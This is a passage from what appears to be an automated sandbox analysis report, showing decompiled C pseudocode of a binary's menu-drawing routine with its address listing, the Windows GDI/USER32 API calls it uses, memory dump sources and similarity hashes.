                                                                                                                                                                                                                                                                                          				signed int _t347;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t167 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t167 ^ _t347;
                                                                                                                                                                                                                                                                                          				_t257 = __edx;
                                                                                                                                                                                                                                                                                          				_t169 =  *((intOrPtr*)(__edx + 0x2c));
                                                                                                                                                                                                                                                                                          				_t341 =  *(__edx + 0x18);
                                                                                                                                                                                                                                                                                          				_t326 = __ecx;
                                                                                                                                                                                                                                                                                          				_v84 = __ecx;
                                                                                                                                                                                                                                                                                          				_v104 = _t169;
                                                                                                                                                                                                                                                                                          				_v80 = _t341;
                                                                                                                                                                                                                                                                                          				if(( *(_t169 + 8) & 0x00000800) == 0) {
                                                                                                                                                                                                                                                                                          					_t170 =  *(__edx + 0x10);
                                                                                                                                                                                                                                                                                          					_v92 = _t170 & 0x00000002;
                                                                                                                                                                                                                                                                                          					_v76 = _t170 & 0x00000001;
                                                                                                                                                                                                                                                                                          					_v96 = _t170 & 0x00000008;
                                                                                                                                                                                                                                                                                          					_v100 = 0;
                                                                                                                                                                                                                                                                                          					__eflags =  *((intOrPtr*)(__edx + 8)) - 0xffff;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(__edx + 8)) == 0xffff) {
                                                                                                                                                                                                                                                                                          						_v76 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t173 =  *(_t257 + 0x1c);
                                                                                                                                                                                                                                                                                          					_t265 =  *((intOrPtr*)(_t257 + 0x20));
                                                                                                                                                                                                                                                                                          					_v24.left = _t173;
                                                                                                                                                                                                                                                                                          					_v24.right =  *((intOrPtr*)(_t326 + 0x98)) + _t173;
                                                                                                                                                                                                                                                                                          					_t303 =  *((intOrPtr*)(_t326 + 0x9c)) + _t265;
                                                                                                                                                                                                                                                                                          					_v24.bottom = _t303;
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_v24.top = _t265;
                                                                                                                                                                                                                                                                                          					OffsetRect( &_v24, 0,  *(_t257 + 0x28) - _t265 - _t303 + _t265 - _t303 >> 1);
                                                                                                                                                                                                                                                                                          					_t182 =  *(_v104 + 0x10);
                                                                                                                                                                                                                                                                                          					_v88 = _t182;
                                                                                                                                                                                                                                                                                          					__eflags = _t182;
                                                                                                                                                                                                                                                                                          					if(_t182 < 0) {
                                                                                                                                                                                                                                                                                          						E00106820( &_v164, 0, 0x30);
                                                                                                                                                                                                                                                                                          						_v164.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          						_t185 = E000F4890(_t257, _t326, _t341);
                                                                                                                                                                                                                                                                                          						__eflags = _t185;
                                                                                                                                                                                                                                                                                          						if(_t185 != 0) {
                                                                                                                                                                                                                                                                                          							_v164.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v164.fMask = 0x18;
                                                                                                                                                                                                                                                                                          						GetMenuItemInfoA( *(_t257 + 0x14),  *(_t257 + 8), 0,  &_v164);
                                                                                                                                                                                                                                                                                          						_t305 = _v96;
                                                                                                                                                                                                                                                                                          						_t268 = _v164.hbmpUnchecked;
                                                                                                                                                                                                                                                                                          						__eflags = _t305;
                                                                                                                                                                                                                                                                                          						if(_t305 != 0) {
                                                                                                                                                                                                                                                                                          							L27:
                                                                                                                                                                                                                                                                                          							_t190 = _v164.fType >> 0x00000009 & 0x00000001;
                                                                                                                                                                                                                                                                                          							__eflags = _t305;
                                                                                                                                                                                                                                                                                          							if(_t305 != 0) {
                                                                                                                                                                                                                                                                                          								_t268 = _v164.hbmpChecked;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v100 = E00102E10( &_v80,  &_v24, _t326, _v76, _v92, _t190, _t268);
                                                                                                                                                                                                                                                                                          							goto L30;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags = _t268;
                                                                                                                                                                                                                                                                                          							if(_t268 != 0) {
                                                                                                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_v40.right = (_v24.right -  *((intOrPtr*)(_t326 + 0x90)) - _v24.left - _t303 >> 1) + _v24.left;
                                                                                                                                                                                                                                                                                          						_t336 = _v96;
                                                                                                                                                                                                                                                                                          						_v100 = 1;
                                                                                                                                                                                                                                                                                          						_v40.bottom = (_v24.bottom -  *((intOrPtr*)(_t326 + 0x94)) - _v24.top - _t303 >> 1) + _v24.top;
                                                                                                                                                                                                                                                                                          						__eflags = _t336;
                                                                                                                                                                                                                                                                                          						if(_t336 == 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _v92;
                                                                                                                                                                                                                                                                                          							if(_v92 != 0) {
                                                                                                                                                                                                                                                                                          								FillRect(_t341,  &_v24, 5);
                                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L36:
                                                                                                                                                                                                                                                                                          							_v56.top =  *((intOrPtr*)(_t257 + 0x20));
                                                                                                                                                                                                                                                                                          							_v56.bottom =  *(_t257 + 0x28);
                                                                                                                                                                                                                                                                                          							_t311 = _v88;
                                                                                                                                                                                                                                                                                          							_v56.left =  *(_t257 + 0x1c) + _t311 + 3;
                                                                                                                                                                                                                                                                                          							_v56.right =  *(_t257 + 0x24) - _t311;
                                                                                                                                                                                                                                                                                          							SetBkMode(_t341, 1);
                                                                                                                                                                                                                                                                                          							_t342 = _v92;
                                                                                                                                                                                                                                                                                          							__eflags = _t342;
                                                                                                                                                                                                                                                                                          							if(_t342 == 0) {
                                                                                                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          								_t202 = ( ~_v76 & 0x00000007) + 7;
                                                                                                                                                                                                                                                                                          								__eflags = _t202;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _v76;
                                                                                                                                                                                                                                                                                          								_t202 = (0 | _v76 != 0x00000000) + 0x10;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t332 = GetSysColor;
                                                                                                                                                                                                                                                                                          							_t258 = GetSysColor(_t202);
                                                                                                                                                                                                                                                                                          							__eflags = _t342;
                                                                                                                                                                                                                                                                                          							if(_t342 != 0) {
                                                                                                                                                                                                                                                                                          								__eflags = _v76;
                                                                                                                                                                                                                                                                                          								if(_v76 == 0) {
                                                                                                                                                                                                                                                                                          									L42:
                                                                                                                                                                                                                                                                                          									_v40.top = _v56.top;
                                                                                                                                                                                                                                                                                          									_v40.left = _v56.left;
                                                                                                                                                                                                                                                                                          									_v40.right = _v56.right;
                                                                                                                                                                                                                                                                                          									_v40.bottom = _v56.bottom;
                                                                                                                                                                                                                                                                                          									OffsetRect( &_v40, 1, 1);
                                                                                                                                                                                                                                                                                          									E00102C90( *((intOrPtr*)(_v104 + 4)), _v84,  &_v80,  &_v40, GetSysColor(0x14));
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									__eflags = _t258 - _v108;
                                                                                                                                                                                                                                                                                          									if(_t258 == _v108) {
                                                                                                                                                                                                                                                                                          										goto L42;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t205 = E00102C90( *((intOrPtr*)(_v104 + 4)), _v84,  &_v80,  &_v56, _t258);
                                                                                                                                                                                                                                                                                          							__eflags = _v8 ^ _t347;
                                                                                                                                                                                                                                                                                          							return E001059E6(_t205, _t258, _v8 ^ _t347,  &_v80, _t332,  *((intOrPtr*)(_v104 + 4)));
                                                                                                                                                                                                                                                                                          							goto L44;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags = _v76;
                                                                                                                                                                                                                                                                                          							if(_v76 == 0) {
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								_v112 = SetTextColor(_t341, GetSysColor(0xf));
                                                                                                                                                                                                                                                                                          								_v108 = SetBkColor(_t341, GetSysColor(0x14));
                                                                                                                                                                                                                                                                                          								_t340 =  *(E00103350( &_v116));
                                                                                                                                                                                                                                                                                          								SetBrushOrgEx(_t341, _v24.left, _v24.top, 0);
                                                                                                                                                                                                                                                                                          								FillRect(_t341,  &_v24, _t340);
                                                                                                                                                                                                                                                                                          								SetTextColor(_t341, _v112);
                                                                                                                                                                                                                                                                                          								SetBkColor(_t341, _v108);
                                                                                                                                                                                                                                                                                          								__eflags = _t340;
                                                                                                                                                                                                                                                                                          								if(_t340 != 0) {
                                                                                                                                                                                                                                                                                          									DeleteObject(_t340);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t336 = _v96;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _v92;
                                                                                                                                                                                                                                                                                          								if(_v92 == 0) {
                                                                                                                                                                                                                                                                                          									L17:
                                                                                                                                                                                                                                                                                          									FillRect(_t341,  &_v24, 5);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                                                                                          						__eflags = _v92;
                                                                                                                                                                                                                                                                                          						if(_v92 != 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _t336;
                                                                                                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          								_t337 = GetSysColorBrush(4);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t337 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t227 = GetSysColorBrush(0x10);
                                                                                                                                                                                                                                                                                          							_t228 = GetSysColorBrush(0x14);
                                                                                                                                                                                                                                                                                          							_t346 = _v84;
                                                                                                                                                                                                                                                                                          							E00102D30(_v88, _t346, __eflags,  &_v80, _v88, _t337, _t228, _t227, _v40.right, _v40.bottom);
                                                                                                                                                                                                                                                                                          							_t326 = _t346;
                                                                                                                                                                                                                                                                                          							L30:
                                                                                                                                                                                                                                                                                          							_t341 = _v80;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags = _v76;
                                                                                                                                                                                                                                                                                          							if(_v76 != 0) {
                                                                                                                                                                                                                                                                                          								L14:
                                                                                                                                                                                                                                                                                          								_v72.top = _v24.top;
                                                                                                                                                                                                                                                                                          								__eflags = _t336;
                                                                                                                                                                                                                                                                                          								_t70 = _t336 == 0;
                                                                                                                                                                                                                                                                                          								__eflags = _t70;
                                                                                                                                                                                                                                                                                          								_v72.right = _v24.right;
                                                                                                                                                                                                                                                                                          								_v72.left = _v24;
                                                                                                                                                                                                                                                                                          								_v72.bottom = _v24.bottom;
                                                                                                                                                                                                                                                                                          								DrawEdge(_t341,  &_v72, (0 | _t70) + (0 | _t70) + 2, 0xf);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t336;
                                                                                                                                                                                                                                                                                          								if(_t336 != 0) {
                                                                                                                                                                                                                                                                                          									goto L14;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							ImageList_Draw( *(_v84 + 0x48), _v88, _t341, _v40.right, _v40.bottom, 1);
                                                                                                                                                                                                                                                                                          							_t326 = _v84;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					asm("sbb edi, edi");
                                                                                                                                                                                                                                                                                          					_t330 = ( ~_v76 & 0x00000009) + 4;
                                                                                                                                                                                                                                                                                          					_v88 =  *((intOrPtr*)(_t326 + 0x98));
                                                                                                                                                                                                                                                                                          					_t193 = GetSysColor(_t330);
                                                                                                                                                                                                                                                                                          					__eflags = _v76;
                                                                                                                                                                                                                                                                                          					_v108 = _t193;
                                                                                                                                                                                                                                                                                          					if(_v76 != 0) {
                                                                                                                                                                                                                                                                                          						L33:
                                                                                                                                                                                                                                                                                          						__eflags = _v100;
                                                                                                                                                                                                                                                                                          						_t194 =  *(_t257 + 0x1c);
                                                                                                                                                                                                                                                                                          						_v40.top =  *((intOrPtr*)(_t257 + 0x20));
                                                                                                                                                                                                                                                                                          						_v40.left = _t194;
                                                                                                                                                                                                                                                                                          						_v40.right =  *(_t257 + 0x24);
                                                                                                                                                                                                                                                                                          						_v40.bottom =  *(_t257 + 0x28);
                                                                                                                                                                                                                                                                                          						if(_v100 != 0) {
                                                                                                                                                                                                                                                                                          							_v40.left = _t194 + _v88 + 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t331 = _t330 + 1;
                                                                                                                                                                                                                                                                                          						__eflags = _t331;
                                                                                                                                                                                                                                                                                          						FillRect(_t341,  &_v40, _t331);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags =  *((intOrPtr*)(_t257 + 0xc)) - 2;
                                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t257 + 0xc)) == 2) {
                                                                                                                                                                                                                                                                                          							goto L33;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L36;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t325 =  *((intOrPtr*)(__edx + 0x24));
                                                                                                                                                                                                                                                                                          					_v56.left =  *(__edx + 0x1c);
                                                                                                                                                                                                                                                                                          					_t250 =  *(__edx + 0x28);
                                                                                                                                                                                                                                                                                          					_v56.bottom = _t250;
                                                                                                                                                                                                                                                                                          					_v56.right = _t325;
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_v56.top =  *((intOrPtr*)(__edx + 0x20)) + (_t250 -  *((intOrPtr*)(__edx + 0x20)) - _t325 >> 1);
                                                                                                                                                                                                                                                                                          					return E001059E6(DrawEdge(_t341,  &_v56, 6, 2), _t257, _v8 ^ _t347, _t325, _t326, _t341);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L44:
                                                                                                                                                                                                                                                                                          			}
























































                                                                                                                                                                                                                                                                                          0x00101de9
                                                                                                                                                                                                                                                                                          0x00101df0
                                                                                                                                                                                                                                                                                          0x00101df5
                                                                                                                                                                                                                                                                                          0x00101df7
                                                                                                                                                                                                                                                                                          0x00101e01
                                                                                                                                                                                                                                                                                          0x00101e05
                                                                                                                                                                                                                                                                                          0x00101e07
                                                                                                                                                                                                                                                                                          0x00101e0a
                                                                                                                                                                                                                                                                                          0x00101e0d
                                                                                                                                                                                                                                                                                          0x00101e10
                                                                                                                                                                                                                                                                                          0x00101e53
                                                                                                                                                                                                                                                                                          0x00101e5b
                                                                                                                                                                                                                                                                                          0x00101e66
                                                                                                                                                                                                                                                                                          0x00101e69
                                                                                                                                                                                                                                                                                          0x00101e73
                                                                                                                                                                                                                                                                                          0x00101e76
                                                                                                                                                                                                                                                                                          0x00101e7a
                                                                                                                                                                                                                                                                                          0x00101e7c
                                                                                                                                                                                                                                                                                          0x00101e7c
                                                                                                                                                                                                                                                                                          0x00101e7f
                                                                                                                                                                                                                                                                                          0x00101e88
                                                                                                                                                                                                                                                                                          0x00101e8d
                                                                                                                                                                                                                                                                                          0x00101e93
                                                                                                                                                                                                                                                                                          0x00101e9e
                                                                                                                                                                                                                                                                                          0x00101ea4
                                                                                                                                                                                                                                                                                          0x00101ea7
                                                                                                                                                                                                                                                                                          0x00101eb3
                                                                                                                                                                                                                                                                                          0x00101eb6
                                                                                                                                                                                                                                                                                          0x00101ebf
                                                                                                                                                                                                                                                                                          0x00101ec2
                                                                                                                                                                                                                                                                                          0x00101ec5
                                                                                                                                                                                                                                                                                          0x00101ec7
                                                                                                                                                                                                                                                                                          0x00102069
                                                                                                                                                                                                                                                                                          0x00102071
                                                                                                                                                                                                                                                                                          0x0010207b
                                                                                                                                                                                                                                                                                          0x00102080
                                                                                                                                                                                                                                                                                          0x00102082
                                                                                                                                                                                                                                                                                          0x00102084
                                                                                                                                                                                                                                                                                          0x00102084
                                                                                                                                                                                                                                                                                          0x0010209f
                                                                                                                                                                                                                                                                                          0x001020a9
                                                                                                                                                                                                                                                                                          0x001020af
                                                                                                                                                                                                                                                                                          0x001020b2
                                                                                                                                                                                                                                                                                          0x001020b8
                                                                                                                                                                                                                                                                                          0x001020ba
                                                                                                                                                                                                                                                                                          0x001020c0
                                                                                                                                                                                                                                                                                          0x001020c9
                                                                                                                                                                                                                                                                                          0x001020cc
                                                                                                                                                                                                                                                                                          0x001020ce
                                                                                                                                                                                                                                                                                          0x001020d0
                                                                                                                                                                                                                                                                                          0x001020d0
                                                                                                                                                                                                                                                                                          0x001020ec
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001020bc
                                                                                                                                                                                                                                                                                          0x001020bc
                                                                                                                                                                                                                                                                                          0x001020be
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001020be
                                                                                                                                                                                                                                                                                          0x00101ecd
                                                                                                                                                                                                                                                                                          0x00101ee2
                                                                                                                                                                                                                                                                                          0x00101eec
                                                                                                                                                                                                                                                                                          0x00101ef9
                                                                                                                                                                                                                                                                                          0x00101efc
                                                                                                                                                                                                                                                                                          0x00101eff
                                                                                                                                                                                                                                                                                          0x00101f06
                                                                                                                                                                                                                                                                                          0x00101f09
                                                                                                                                                                                                                                                                                          0x00101f0b
                                                                                                                                                                                                                                                                                          0x00101ff9
                                                                                                                                                                                                                                                                                          0x00101ffd
                                                                                                                                                                                                                                                                                          0x00102015
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00102153
                                                                                                                                                                                                                                                                                          0x0010215c
                                                                                                                                                                                                                                                                                          0x00102162
                                                                                                                                                                                                                                                                                          0x00102165
                                                                                                                                                                                                                                                                                          0x00102171
                                                                                                                                                                                                                                                                                          0x00102174
                                                                                                                                                                                                                                                                                          0x00102177
                                                                                                                                                                                                                                                                                          0x0010217d
                                                                                                                                                                                                                                                                                          0x00102180
                                                                                                                                                                                                                                                                                          0x00102182
                                                                                                                                                                                                                                                                                          0x00102196
                                                                                                                                                                                                                                                                                          0x0010219b
                                                                                                                                                                                                                                                                                          0x0010219b
                                                                                                                                                                                                                                                                                          0x00102184
                                                                                                                                                                                                                                                                                          0x00102186
                                                                                                                                                                                                                                                                                          0x0010218c
                                                                                                                                                                                                                                                                                          0x0010218c
                                                                                                                                                                                                                                                                                          0x0010219e
                                                                                                                                                                                                                                                                                          0x001021a7
                                                                                                                                                                                                                                                                                          0x001021a9
                                                                                                                                                                                                                                                                                          0x001021ab
                                                                                                                                                                                                                                                                                          0x001021ad
                                                                                                                                                                                                                                                                                          0x001021b1
                                                                                                                                                                                                                                                                                          0x001021b8
                                                                                                                                                                                                                                                                                          0x001021c3
                                                                                                                                                                                                                                                                                          0x001021c6
                                                                                                                                                                                                                                                                                          0x001021d2
                                                                                                                                                                                                                                                                                          0x001021d5
                                                                                                                                                                                                                                                                                          0x001021d8
                                                                                                                                                                                                                                                                                          0x001021f5
                                                                                                                                                                                                                                                                                          0x001021b3
                                                                                                                                                                                                                                                                                          0x001021b3
                                                                                                                                                                                                                                                                                          0x001021b6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001021b6
                                                                                                                                                                                                                                                                                          0x001021b1
                                                                                                                                                                                                                                                                                          0x0010220d
                                                                                                                                                                                                                                                                                          0x00102217
                                                                                                                                                                                                                                                                                          0x00102222
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101f11
                                                                                                                                                                                                                                                                                          0x00101f11
                                                                                                                                                                                                                                                                                          0x00101f15
                                                                                                                                                                                                                                                                                          0x00101f21
                                                                                                                                                                                                                                                                                          0x00101f35
                                                                                                                                                                                                                                                                                          0x00101f45
                                                                                                                                                                                                                                                                                          0x00101f50
                                                                                                                                                                                                                                                                                          0x00101f5a
                                                                                                                                                                                                                                                                                          0x00101f66
                                                                                                                                                                                                                                                                                          0x00101f71
                                                                                                                                                                                                                                                                                          0x00101f7c
                                                                                                                                                                                                                                                                                          0x00101f82
                                                                                                                                                                                                                                                                                          0x00101f84
                                                                                                                                                                                                                                                                                          0x00101f87
                                                                                                                                                                                                                                                                                          0x00101f87
                                                                                                                                                                                                                                                                                          0x00101f8d
                                                                                                                                                                                                                                                                                          0x00101f17
                                                                                                                                                                                                                                                                                          0x00101f17
                                                                                                                                                                                                                                                                                          0x00101f1b
                                                                                                                                                                                                                                                                                          0x00101fff
                                                                                                                                                                                                                                                                                          0x00102006
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101f1b
                                                                                                                                                                                                                                                                                          0x00101f15
                                                                                                                                                                                                                                                                                          0x00101f90
                                                                                                                                                                                                                                                                                          0x00101f90
                                                                                                                                                                                                                                                                                          0x00101f94
                                                                                                                                                                                                                                                                                          0x00102026
                                                                                                                                                                                                                                                                                          0x00102028
                                                                                                                                                                                                                                                                                          0x00102032
                                                                                                                                                                                                                                                                                          0x0010202a
                                                                                                                                                                                                                                                                                          0x0010202a
                                                                                                                                                                                                                                                                                          0x0010202a
                                                                                                                                                                                                                                                                                          0x0010203e
                                                                                                                                                                                                                                                                                          0x00102043
                                                                                                                                                                                                                                                                                          0x00102048
                                                                                                                                                                                                                                                                                          0x00102052
                                                                                                                                                                                                                                                                                          0x00102057
                                                                                                                                                                                                                                                                                          0x001020ef
                                                                                                                                                                                                                                                                                          0x001020ef
                                                                                                                                                                                                                                                                                          0x00101f9a
                                                                                                                                                                                                                                                                                          0x00101f9a
                                                                                                                                                                                                                                                                                          0x00101f9e
                                                                                                                                                                                                                                                                                          0x00101fa4
                                                                                                                                                                                                                                                                                          0x00101fad
                                                                                                                                                                                                                                                                                          0x00101fb2
                                                                                                                                                                                                                                                                                          0x00101fb4
                                                                                                                                                                                                                                                                                          0x00101fb4
                                                                                                                                                                                                                                                                                          0x00101fb9
                                                                                                                                                                                                                                                                                          0x00101fbf
                                                                                                                                                                                                                                                                                          0x00101fc5
                                                                                                                                                                                                                                                                                          0x00101fcf
                                                                                                                                                                                                                                                                                          0x00101fa0
                                                                                                                                                                                                                                                                                          0x00101fa0
                                                                                                                                                                                                                                                                                          0x00101fa2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101fa2
                                                                                                                                                                                                                                                                                          0x00101feb
                                                                                                                                                                                                                                                                                          0x00101ff1
                                                                                                                                                                                                                                                                                          0x00101ff1
                                                                                                                                                                                                                                                                                          0x00101f94
                                                                                                                                                                                                                                                                                          0x001020fd
                                                                                                                                                                                                                                                                                          0x00102102
                                                                                                                                                                                                                                                                                          0x00102106
                                                                                                                                                                                                                                                                                          0x00102109
                                                                                                                                                                                                                                                                                          0x0010210f
                                                                                                                                                                                                                                                                                          0x00102113
                                                                                                                                                                                                                                                                                          0x00102116
                                                                                                                                                                                                                                                                                          0x0010211e
                                                                                                                                                                                                                                                                                          0x0010211e
                                                                                                                                                                                                                                                                                          0x00102125
                                                                                                                                                                                                                                                                                          0x0010212b
                                                                                                                                                                                                                                                                                          0x00102131
                                                                                                                                                                                                                                                                                          0x00102134
                                                                                                                                                                                                                                                                                          0x00102137
                                                                                                                                                                                                                                                                                          0x0010213a
                                                                                                                                                                                                                                                                                          0x00102143
                                                                                                                                                                                                                                                                                          0x00102143
                                                                                                                                                                                                                                                                                          0x00102146
                                                                                                                                                                                                                                                                                          0x00102146
                                                                                                                                                                                                                                                                                          0x0010214d
                                                                                                                                                                                                                                                                                          0x00102118
                                                                                                                                                                                                                                                                                          0x00102118
                                                                                                                                                                                                                                                                                          0x0010211c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010211c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101e12
                                                                                                                                                                                                                                                                                          0x00101e18
                                                                                                                                                                                                                                                                                          0x00101e1b
                                                                                                                                                                                                                                                                                          0x00101e1e
                                                                                                                                                                                                                                                                                          0x00101e21
                                                                                                                                                                                                                                                                                          0x00101e26
                                                                                                                                                                                                                                                                                          0x00101e29
                                                                                                                                                                                                                                                                                          0x00101e39
                                                                                                                                                                                                                                                                                          0x00101e52
                                                                                                                                                                                                                                                                                          0x00101e52
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • DrawEdge.USER32(?,?,00000006,00000002), ref: 00101E3C
                                                                                                                                                                                                                                                                                          • OffsetRect.USER32(000FC527,00000000,?), ref: 00101EB6
                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00101F29
                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00101F2D
                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000014), ref: 00101F38
                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00101F3C
                                                                                                                                                                                                                                                                                          • SetBrushOrgEx.GDI32(?,000FC527,?,00000000,?,?,?), ref: 00101F5A
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 00101F66
                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00101F71
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Color$RectText$BrushDrawEdgeFillOffset
                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                          • API String ID: 951962733-3772416878
                                                                                                                                                                                                                                                                                          • Opcode ID: 55b8a382b433ee6f7dce3daa61e0e63085588c8770930ce5e0d1f3432faeed7e
                                                                                                                                                                                                                                                                                          • Instruction ID: 16f8403fd1a419eebaa1d0061ab4a3b62f96d1ec602157b380e506e10722f1a0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55b8a382b433ee6f7dce3daa61e0e63085588c8770930ce5e0d1f3432faeed7e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFE11DB5E002199FDB18CFA8C985AEEB7B5FF88300F158159E909AB384D7B4AD45CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000F6040(CHAR* __eax, CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				void* _v5;
                                                                                                                                                                                                                                                                                          				signed int _v6;
                                                                                                                                                                                                                                                                                          				char _v11;
                                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                                          				CHAR* _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				int _t73;
                                                                                                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                                                                                                          				CHAR* _t75;
                                                                                                                                                                                                                                                                                          				int _t76;
                                                                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                                                                                                          				int _t79;
